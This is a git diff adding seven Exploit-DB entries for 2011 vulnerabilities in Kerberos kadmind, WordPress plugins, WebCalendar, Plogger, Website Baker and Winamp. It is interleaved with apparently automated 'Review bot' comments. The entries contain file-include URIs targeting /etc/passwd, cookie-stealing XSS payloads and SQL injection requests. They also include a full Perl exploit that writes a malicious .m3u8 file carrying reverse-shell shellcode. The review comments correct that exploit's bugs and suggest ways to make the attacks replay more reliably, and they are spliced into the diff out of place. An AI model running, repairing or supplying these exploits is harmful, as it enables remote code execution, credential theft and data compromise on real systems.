diff --git a/files.csv b/files.csv
index edd271cd5..638316117 100755
--- a/files.csv
+++ b/files.csv
@@ -32060,3 +32060,10 @@ id,file,description,date,author,platform,type,port
 35602,platforms/php/webapps/35602.txt,"Etki Video PRO 2.0 kategori.asp cat Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0
 35603,platforms/php/webapps/35603.txt,"Live Wire 2.3.1 For Wordpress Multiple Security Vulnerabilities",2011-04-11,MustLive,php,webapps,0
 35604,platforms/php/webapps/35604.txt,"eForum 1.1 '/eforum.php' Arbitrary File Upload Vulnerability",2011-04-09,QSecure,php,webapps,0
+35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 kadmind Change Password Feature Remote Code Execution Vulnerability",2011-04-11,"Felipe Ortega",linux,remote,0
+35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for WordPress 'general.php' Local and Remote File Include Vulnerabilities",2011-04-12,"Dr Trojan",php,webapps,0
+35608,platforms/php/webapps/35608.txt,"The Gazette Edition 2.9.4 For Wordpress Multiple Security Vulnerabilities",2011-04-12,MustLive,php,webapps,0
+35609,platforms/php/webapps/35609.txt,"WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0
+35610,platforms/php/webapps/35610.txt,"Plogger 1.0 Rc1 'gallery_name' Parameter Cross Site Scripting Vulnerability",2011-04-12,"High-Tech Bridge SA",php,webapps,0
+35611,platforms/php/webapps/35611.txt,"Website Baker 2.8.1 Multiple SQL Injection Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0
+35612,platforms/windows/remote/35612.pl,"Winamp 5.6.1 '.m3u8' File Remote Buffer Overflow Vulnerability",2011-04-12,KedAns-Dz,windows,remote,0
diff --git a/platforms/linux/remote/35606.txt b/platforms/linux/remote/35606.txt
new file mode 100755
index 000000000..f348f50de
--- /dev/null
+++ b/platforms/linux/remote/35606.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/47310/info
+
+MIT Kerberos is prone to a remote code-execution vulnerability in 'kadmind'.
+
+An attacker may exploit this issue to execute arbitrary code with superuser privileges. Failed attempts will cause the affected application to crash, denying service to legitimate users. A successful exploit will completely compromise affected computers.
+
+MIT Kerberos 5 1.7 and later are vulnerable.
+
+NOTE (April 13, 2011): This BID was originally titled 'MIT Kerberos kadmind Version String Processing Remote Denial Of Service Vulnerability', but has been renamed to better reflect the nature of the issue.
+
+# nmap -n -sV krb01
\ No newline at end of file
diff --git a/platforms/php/webapps/35607.txt b/platforms/php/webapps/35607.txt
new file mode 100755
index 000000000..b5cf9c8af
--- /dev/null
+++ b/platforms/php/webapps/35607.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/47317/info
+
+The Spellchecker plugin for WordPress is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
+
+Spellchecker 3.1 is vulnerable; other versions may also be affected.
+
+The following example URIs are available:
+
+http://www.example.com/general.php?file=http://sitename.com/Evil.txt?
+
+http://www.example.com/general.php?file=../../../../../../../etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/35608.txt b/platforms/php/webapps/35608.txt
new file mode 100755
index 000000000..df203b746
--- /dev/null
+++ b/platforms/php/webapps/35608.txt
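Review bot: The only actionable line in the new file is `# nmap -n -sV krb01`, a service/version scan that neither triggers nor confirms the kadmind fault, so the entry carries no reproduction of the change-password remote code execution the index title claims. The affected-range statement `MIT Kerberos 5 1.7 and later are vulnerable` is open-ended and becomes wrong for any fixed release; it should name the patched version or at least scope the claim to the advisory date. The file's own note records that the issue was first classified as a denial of service, so the "remote code execution" framing deserves a hedge unless a working exploit or upstream advisory is referenced, e.g. `# No public PoC in this entry; see the vendor advisory for the affected kadmind versions and fix.`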
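Review bot: The remote-include example `?file=http://sitename.com/Evil.txt?` only works when the target's PHP has `allow_url_include` enabled, which is off by default, and the file does not say so; a practitioner reading this entry needs the line `Remote include requires allow_url_include=On; the traversal variant does not.` The local-include URI uses a fixed seven-level `../` traversal, which only succeeds if general.php sits at that depth, so the count may need adjusting per install. Both example URIs place general.php at the site root, which looks unlikely for a WordPress plugin file; the actual plugin path is not given and should be confirmed against the source advisory.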
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/47320/info
+
+The Gazette Edition for Wordpress is prone to multiple security vulnerabilities. These vulnerabilities include multiple denial-of-service vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability.
+
+Exploiting these issues could allow an attacker to deny service to legitimate users, gain access to sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. Other attacks may also be possible.
+
+Gazette Edition for Wordpress 2.9.4 and prior versions are vulnerable.
+
+http://www.example.com/wp-content/themes/gazette/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E
+
+http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site
+
+http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site/big_file&h=1&w=1
\ No newline at end of file
diff --git a/platforms/php/webapps/35609.txt b/platforms/php/webapps/35609.txt
new file mode 100755
index 000000000..faa3d0c41
--- /dev/null
+++ b/platforms/php/webapps/35609.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/47328/info
+
+WebCalendar is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+WebCalendar 1.2.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/login.php?last_login=123%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/colors.php?color="><%73cript>alert(document.cookie);
\ No newline at end of file
diff --git a/platforms/php/webapps/35610.txt b/platforms/php/webapps/35610.txt
new file mode 100755
index 000000000..cbb1a880a
--- /dev/null +++ b/platforms/php/webapps/35610.txt @@ -0,0 +1,21 @@ +source: http://www.securityfocus.com/bid/47329/info + +Plogger is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Plogger 1.0 Rc1 is vulnerable; other versions may also be affected. + +
+ + + + + + + + +
+
\ No newline at end of file
diff --git a/platforms/php/webapps/35611.txt b/platforms/php/webapps/35611.txt
new file mode 100755
index 000000000..72cdaa3d5
--- /dev/null
+++ b/platforms/php/webapps/35611.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/47332/info
+
+Website Baker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Website Baker 2.8.1 is vulnerable; other versions may also be affected.
+
+POST /admin/users/add.php HTTP/1.1
+
+user_id=&username_fieldname=username_1hnuvyv2&username_1hnuvyv2=test&password=password&password2=password&display_name=test&email=test%40test.com&home_folder=123'SQL_CODE&groups%5B%5D=123'SQL_CODE&active%5B%5D=1&submit=Add
+
+
+POST /admin/groups/add.php HTTP/1.1
+
+advanced=no&group_id=&group_name=123%27SQL_CODE_HERE&module_permissions%5B%5D=code&module_permissions%5B%5D=form&module_permissions%5B%5D=menu_link&module_permissions%5B%5D=news&module_permissions%5B%5D=wrapper&module_permissions%5B%5D=wysiwyg&template_permissions%5B%5D=allcss&template_permissions%5B%5D=argos_theme&template_permissions%5B%5D=blank&template_permissions%5B%5D=classic_theme&template_permissions%5B%5D=round&template_permissions%5B%5D=simple&template_permissions%5B%5D=wb_theme&submit=Add
\ No newline at end of file
diff --git a/platforms/windows/remote/35612.pl b/platforms/windows/remote/35612.pl
new file mode 100755
index 000000000..fb203b1c8
--- /dev/null
+++ b/platforms/windows/remote/35612.pl
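Review bot: Everything after `Plogger 1.0 Rc1 is vulnerable; other versions may also be affected.` is empty added lines as rendered here, so the committed file shows no request at all for the `gallery_name` parameter the index title names; if the original PoC was an HTML form, it appears to have been stripped and the file should be checked against the source advisory before anyone relies on it. The hunk header advertises 21 lines but fewer are visible, which supports that reading. At minimum the text should name the vulnerable script and the HTTP method so the entry is reproducible without the markup, e.g. `Vulnerable request: <method> <script path>, parameter gallery_name (reflected without encoding).`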
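Review bot: Both requests target `/admin/users/add.php` and `/admin/groups/add.php`, which by path are backend administration endpoints and presumably need an authenticated administrator session, yet the description never states the privilege required; a post-authentication SQL injection in user/group creation is a materially different risk from an unauthenticated one, so add `Requires an authenticated Website Baker administrator session (admin backend).` The request skeletons also omit the `Host`, `Content-Type: application/x-www-form-urlencoded` and session `Cookie` headers a tester would need to replay them. The injection points are `home_folder`, `groups[]` and `group_name`, marked with two different placeholders (`SQL_CODE` and `SQL_CODE_HERE`); a single placeholder would make the three sinks easier to spot.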
@@ -0,0 +1,109 @@
+source: http://www.securityfocus.com/bid/47333/info
+
+Winamp is prone to a remote buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
+
+Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+Winamp 5.6.1 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/perl
+
+###
+# Title : Winamp 5.6.1 (.m3u8) Stack Buffer Overflow
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com || ked-h@exploit-id.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Twitter page : twitter.com/kedans
+# platform : windows
+# Impact : Stack Overflow
+# Tested on : Windows XP sp3 FR
+###
+# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
+##
+# [»] ~ special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team
+###
+
+my $header = "#EXTM3U\n";
+my $junk = "\x41" x 16240; # Buffer Junk
+my $eip = "\xad\x86\x0e\x07"; # overwrite EIP - 070E86AD | FFD4 CALL ESP nde.dll
+my $seh = pack('V',0x10017928); # add ESP,4404
+$seh = $seh.pack('V',0x00000003); # Value de : EAX
+$seh = $seh."\x41" x 11;
+$seh = $seh.pack('V',0x41414141); # Value de : ECX
+$seh = $seh."\x41" x 3;
+$seh = $seh.pack('V',0x007EA478); # Value de : EDX
+$seh = $seh."\x41" x 22;
+$seh = $seh.pack('V',0x40000001); # Value de : EBX
+$seh = $seh."\x41" x 8;
+$seh = $seh.pack('V',0x028F1DB0); # Valeu de : ESP
+$seh = $seh."\x41" x 12;
+$seh = $seh.pack('V',0x77230459); # Valeu de : EBP
+$seh = $seh."\x41" x 10;
+$seh = $seh.pack('V',0x08FD62A8); # Valeu de : ESI
+$seh = $seh."\x41" x 11;
+$seh = $seh.pack('V',0x00497300); # Valeu de : EDI
+$seh = $seh."\x41" x 2;
+$seh = $seh.pack('V',0x08FD293C); # Valeu de : EIP
+$seh = $seh."\x41" x 5;
+my $nops = "\x90" x 100; # Nop
+my $space = "\x41" x (43492 - length($junk) - length($nops));
+my $shellcode = # windows/shell_reverse_tcp (http://www.metasploit.com)
+"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
+"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
+"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
+"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
+"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
+"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
+"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
+"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d" .
+"\x38\x4e\x69\x47\x70\x43\x30\x45\x50\x45\x30\x4d\x59\x4a" .
+"\x45\x45\x61\x48\x52\x43\x54\x4e\x6b\x50\x52\x50\x30\x4c" .
+"\x4b\x51\x42\x46\x6c\x4e\x6b\x46\x32\x46\x74\x4c\x4b\x50" .
+"\x72\x46\x48\x46\x6f\x4f\x47\x43\x7a\x51\x36\x46\x51\x49" .
+"\x6f\x46\x51\x4f\x30\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x43" .
+"\x32\x44\x6c\x47\x50\x4f\x31\x48\x4f\x46\x6d\x43\x31\x49" .
+"\x57\x48\x62\x4c\x30\x51\x42\x42\x77\x4c\x4b\x50\x52\x42" .
+"\x30\x4c\x4b\x43\x72\x45\x6c\x46\x61\x4a\x70\x4c\x4b\x43" .
+"\x70\x43\x48\x4e\x65\x4b\x70\x42\x54\x50\x4a\x45\x51\x48" .
+"\x50\x46\x30\x4e\x6b\x50\x48\x45\x48\x4e\x6b\x51\x48\x51" .
+"\x30\x45\x51\x48\x53\x48\x63\x47\x4c\x43\x79\x4e\x6b\x47" .
+"\x44\x4e\x6b\x46\x61\x4b\x66\x50\x31\x4b\x4f\x44\x71\x4f" .
+"\x30\x4e\x4c\x49\x51\x4a\x6f\x46\x6d\x46\x61\x4f\x37\x46" .
+"\x58\x4d\x30\x42\x55\x4a\x54\x46\x63\x43\x4d\x4c\x38\x47" .
+"\x4b\x51\x6d\x44\x64\x44\x35\x49\x72\x43\x68\x4c\x4b\x50" .
+"\x58\x45\x74\x47\x71\x48\x53\x51\x76\x4e\x6b\x46\x6c\x42" .
+"\x6b\x4c\x4b\x42\x78\x47\x6c\x45\x51\x48\x53\x4e\x6b\x45" .
+"\x54\x4c\x4b\x47\x71\x48\x50\x4f\x79\x42\x64\x44\x64\x47" .
+"\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x43\x6a\x46\x31\x4b" .
+"\x4f\x4d\x30\x50\x58\x43\x6f\x43\x6a\x4c\x4b\x45\x42\x48" .
+"\x6b\x4e\x66\x43\x6d\x42\x48\x50\x33\x44\x72\x45\x50\x43" .
+"\x30\x51\x78\x42\x57\x42\x53\x46\x52\x43\x6f\x50\x54\x43" .
+"\x58\x42\x6c\x44\x37\x44\x66\x45\x57\x49\x6f\x48\x55\x48" .
+"\x38\x4c\x50\x47\x71\x45\x50\x47\x70\x47\x59\x4b\x74\x51" .
+"\x44\x42\x70\x42\x48\x44\x69\x4d\x50\x42\x4b\x43\x30\x49" .
+"\x6f\x48\x55\x50\x50\x42\x70\x50\x50\x42\x70\x47\x30\x42" .
+"\x70\x43\x70\x50\x50\x43\x58\x48\x6a\x44\x4f\x49\x4f\x4d" .
+"\x30\x49\x6f\x4b\x65\x4e\x69\x48\x47\x42\x48\x43\x4f\x45" .
+"\x50\x43\x30\x47\x71\x43\x58\x43\x32\x45\x50\x44\x51\x43" .
+"\x6c\x4e\x69\x4a\x46\x51\x7a\x42\x30\x51\x46\x43\x67\x42" .
+"\x48\x4d\x49\x4e\x45\x51\x64\x51\x71\x49\x6f\x4e\x35\x50" .
+"\x68\x42\x43\x42\x4d\x42\x44\x47\x70\x4c\x49\x48\x63\x51" .
+"\x47\x51\x47\x51\x47\x50\x31\x4b\x46\x51\x7a\x47\x62\x51" .
+"\x49\x50\x56\x4d\x32\x49\x6d\x50\x66\x4f\x37\x42\x64\x46" .
+"\x44\x45\x6c\x47\x71\x43\x31\x4c\x4d\x50\x44\x51\x34\x42" .
+"\x30\x4a\x66\x43\x30\x43\x74\x50\x54\x42\x70\x43\x66\x43" .
+"\x66\x51\x46\x47\x36\x46\x36\x42\x6e\x50\x56\x46\x36\x42" .
+"\x73\x43\x66\x50\x68\x44\x39\x48\x4c\x47\x4f\x4b\x36\x4b" .
+"\x4f\x48\x55\x4c\x49\x4b\x50\x50\x4e\x42\x76\x43\x76\x49" .
+"\x6f\x50\x30\x42\x48\x43\x38\x4c\x47\x47\x6d\x43\x50\x49" .
+"\x6f\x4e\x35\x4f\x4b\x4a\x50\x4d\x65\x4d\x72\x51\x46\x51" .
+"\x78\x4d\x76\x4e\x75\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x47" .
+"\x4c\x46\x66\x43\x4c\x45\x5a\x4b\x30\x49\x6b\x49\x70\x43" .
+"\x45\x45\x55\x4d\x6b\x51\x57\x44\x53\x43\x42\x42\x4f\x51" .
+"\x7a\x47\x70\x46\x33\x4b\x4f\x49\x45\x41\x41";
+my $end = "\x90" x (20000 - $nops); # Nop sled
+open(FILE,'>>KedAns.m3u8');
+print FILE $header.$junk.$space.$seh.$nops.$eip.$shellcode.$end;
+close(FILE);
+
+
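Review bot: `my $end = "\x90" x (20000 - $nops);` uses the NOP string itself in numeric context; `"\x90" x 100` numifies to 0 (with a warning the script never enables), so the trailing sled is always 20000 bytes rather than the `20000 - length($nops)` the `$space` arithmetic a few lines up suggests was intended, and the file's total size is not what the offsets assume. The output is opened with `open(FILE,'>>KedAns.m3u8')` — append mode, bareword handle, no error check — so a second run silently appends a second payload to the same file and corrupts every offset; `use strict; use warnings;` under the shebang would have flagged the first bug, and a checked three-arg truncating open fixes the second. The hard-coded `CALL ESP` address `0x070E86AD` in nde.dll and the `$seh` register block are tied to the `Windows XP sp3 FR` build named in the header, and the reverse-shell callback host/port is baked into the encoded shellcode without being documented, so a comment stating the LHOST/LPORT used (or that the shellcode must be regenerated) belongs next to `my $shellcode`.
```perl
# … unchanged: header comments, $junk/$eip/$seh/$nops/$space/$shellcode construction …
my $end = "\x90" x (20000 - length($nops)); # Nop sled sized from the NOP string's length, not its numeric value
open(my $fh, '>', 'KedAns.m3u8') or die "open KedAns.m3u8: $!"; # truncate, never append
print {$fh} $header.$junk.$space.$seh.$nops.$eip.$shellcode.$end;
close($fh) or die "close KedAns.m3u8: $!";
```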